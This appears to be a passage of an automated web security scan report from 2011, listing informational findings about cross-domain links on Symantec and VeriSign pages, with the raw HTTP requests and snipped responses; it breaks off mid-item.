HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:07 GMT Server: saws Cache-Control: private Content-Type: text/html Vary: Accept-Encoding Content-Length: 52678 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <li><a href="http://www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="http://www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="http://www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="http://www.verisign.fr/"> France</a>...[SNIP]... <li><a href="http://www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="http://www.verisign.in/"> India</a>...[SNIP]... <li><a href="http://www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="http://www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="http://www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="http://www.verisign.ch/"> Switzerland</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=query.verisign.com&lang=en">...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href='//www.verisign.ch/contact-information/index.html?tid=footer'> Contact Us</a></li><li><a href='//www.verisign.ch/corporate/index.html?tid=footer'> About Us</a>...[SNIP]... <li><a href='//www.verisign.ch/legal-notices/index.html?tid=footer'> Legal Notices</a>...[SNIP]... <li><a href='//www.verisign.ch/privacy/index.html?tid=footer'> Privacy</a></li><li><a href='//www.verisign.ch/repository/index.html?tid=footer'> Repository</a>...[SNIP]... 
<li><a href='//www.verisign.ch/site-map/index.html?tid=footer'> Site Map</a>...[SNIP]... <a href='javascript:O_LC();'><img src='//verisign.ch/assets/shared/images/sm_004276_oo.gif' alt='Feedback' style='margin-right:5px;' /> Feedback</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a> (NASDAQ: SYMC), provides solutions that allow companies and consumers to engage in communications and commerce online with confidence. VeriSign Authentication Services include <a href='//www.verisign.ch/ssl/ssl-information-center/index.html'> SSL</a>, <a href='//www.verisign.ch/ssl/index.html'> SSL Certificates</a>, <a href='//www.verisign.ch/ssl/ssl-information-center/ev-ssl-certificate/index.html'> Extended Validation</a> (<a href='//www.verisign.ch/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html'> EV SSL</a>), <a href='//www.verisign.ch/trust-seal/index.html'> VeriSign Trust Seal</a>...[SNIP]... </a>, <a href='//www.verisign.ch/trust-seal/resources/malware-faq/index.html'> malware scan</a>, <a href='//www.verisign.ch/code-signing/index.html'> code signing</a>...[SNIP]...
14.26. http://searchg.symantec.com/search
Summary
Severity: Information
Confidence: Certain
Host: http://searchg.symantec.com
Path: /search
Issue detail
The page was loaded from a URL containing a query string: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1
The response contains the following link to another domain: http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1
Request
GET /search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 HTTP/1.1 Host: searchg.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622035736-New%7C1336358035736%3B%20event69%3Devent69%7C1336358035737%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:03 GMT Server: saws Cache-Control: private Content-Type: text/html x-content-type-options: nosniff Vary: Accept-Encoding Content-Length: 36924 Connection: close <html><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en...[SNIP]... <b><a onclick="TrackSSOB(this, 'symsugg')" href="http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1"> Norton Protection Weblog<br>...[SNIP]...
14.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch
Summary
Severity: Information
Confidence: Certain
Host: https://securitycenter.verisign.com
Path: /celp/enroll/outsideSearch
Issue detail
The page was loaded from a URL containing a query string: https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP
The response contains the following link to another domain: https://ssl.google-analytics.com/urchin.js
Request
GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/ Connection: close <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <title> Search for SSL or Code Signing Certificates from VeriSig...[SNIP]... <body aLink=#000000 bgColor=#ffffff class=bgWht leftMargin=0 link=#000000 topMargin=0 vLink=#000000 marginheight="0" marginwidth="0" onLoad="focus()"><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]...
14.28. http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200?inid=us_hhobanner_norton_greenpc
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc
Request
GET /store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200?inid=us_hhobanner_norton_greenpc HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:40 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc Content-Length: 279 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc"> here</a>...[SNIP]...
14.29. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq?inid=us_hhobanner_nortongiftguide2008
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq?inid=us_hhobanner_nortongiftguide2008 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:39 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008 Content-Length: 284 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008"> here</a>...[SNIP]...
14.30. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/?inid=us_hhobanner_earth_day
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/?inid=us_hhobanner_earth_day HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:38 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day"> here</a>...[SNIP]...
14.31. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/?inid=us_hho_homepage_hero_mac2010lp
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/?inid=us_hho_homepage_hero_mac2010lp HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:34 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp"> here</a>...[SNIP]...
14.32. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/?inid=us_hhobanner_2year
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hhobanner_2year
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/?inid=us_hhobanner_2year HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:35 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_2year Content-Length: 270 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_2year"> here</a>...[SNIP]...
14.33. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7?inid=us_hho_homepage_hero_windows7
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7?inid=us_hho_homepage_hero_windows7 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:35 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7 Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7"> here</a>...[SNIP]...
14.34. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/?inid=us_hho_homepage_hero_nisnavstore2010
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/?inid=us_hho_homepage_hero_nisnavstore2010 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:37 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010 Content-Length: 288 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010"> here</a>...[SNIP]...
14.35. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400?inid=us_hhobanner_nisnaveol
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400?inid=us_hhobanner_nisnaveol HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:38 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol"> here</a>...[SNIP]...
14.36. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/?inid=us_hho_homepage_hero_nisnustore2010
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/?inid=us_hho_homepage_hero_nisnustore2010 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:36 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010 Content-Length: 287 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010"> here</a>...[SNIP]...
14.37. http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300
Summary
Severity: Information
Confidence: Certain
Host: http://shop.symantecstore.com
Path: /store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300
Issue detail
The page was loaded from a URL containing a query string: http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300?inid=us_hhobanner_pc_powerboost_2008
The response contains the following link to another domain: http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008
Request
GET /store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300?inid=us_hhobanner_pc_powerboost_2008 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:40 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008 Content-Length: 283 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008"> here</a>...[SNIP]...
14.38. https://ssl-certificate-center.verisign.ch/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The page was loaded from a URL containing a query string: https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
The response contains the following links to other domains:
https://ssl.google-analytics.com/urchin.js
https://www.verisign.ch/repository/index.html
https://www.verisign.ch/repository/legal-notices.html
https://www.verisign.ch/repository/privacy.html
https://www.verisign.ch/ssl/buy-ssl-certificates/index.html
https://www.verisign.com/js/mbox.js
Request
GET /process/retail/console_login?application_locale=VRSN_CH HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34E1AEF0DB2D10DB645D8BD14E31479C; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"> </script>...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <p>To buy, renew or replace a certificate and get your VeriSign.. Trust Center sign-in, go to <a href="https://www.verisign.ch/ssl/buy-ssl-certificates/index.html" target="_blank"> Buy SSL Certificates >></a>...[SNIP]... <div class="inlineimg" style="padding-left:0px"><a target="_blank" href="https://www.verisign.ch/repository/legal-notices.html"> Legal Notices</a>...[SNIP]... <div class="inlineimg"><a target="_blank" href="https://www.verisign.ch/repository/privacy.html"> Privacy</a></div><div class="inline"><a target="_blank" href="https://www.verisign.ch/repository/index.html"> Repository</a>...[SNIP]...
14.39. https://ssl-certificate-center.verisign.com/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.com
Path: /process/retail/console_login
Issue detail
The page was loaded from a URL containing a query string: https://ssl-certificate-center.verisign.com/process/retail/console_login?application_locale=VRSN_US
The response contains the following links to other domains:
https://cert.webtrust.org/ViewSeal?id=304
https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/console_login?application_locale=VRSN_US HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:44 GMT Server: Apache Set-Cookie: TLTHID=3597AA5CDB2D10DB49F0B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12293 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"> <img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">...[SNIP]...
14.40. http://store.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: http://store.symantec.com
Path: /
Issue detail
The page was loaded from a URL containing a query string: http://store.symantec.com/?inid=us_pagenotfound_smb_store
The response contains the following links to other domains:
http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js
http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js
http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js
http://ajax.microsoft.com/ajax/jquery.ui/1.8.9/themes/cupertino/jquery-ui.css
Request
GET /?inid=us_pagenotfound_smb_store HTTP/1.1 Host: store.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:30:57 GMT Content-Length: 18197 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <!-- ...[SNIP]... <!-- Microsoft CDN Script References --> <script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js" type="text/javascript"> </script> <script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js" type="text/javascript"> </script>...[SNIP]... <!-- Microsoft CDN CSS References --> <link href="http://ajax.microsoft.com/ajax/jquery.ui/1.8.9/themes/cupertino/jquery-ui.css" rel="stylesheet" type="text/css" /> <title>...[SNIP]... <!-- Microsoft CDN Script References --> <script src="http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js" type="text/javascript"> </script>...[SNIP]...
14.41. https://symantec-corporation.com/servlet/campaignrespondent
Summary
Severity: Information
Confidence: Certain
Host: https://symantec-corporation.com
Path: /servlet/campaignrespondent
Issue detail
The page was loaded from a URL containing a query string: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004
The response contains the following links to other domains:
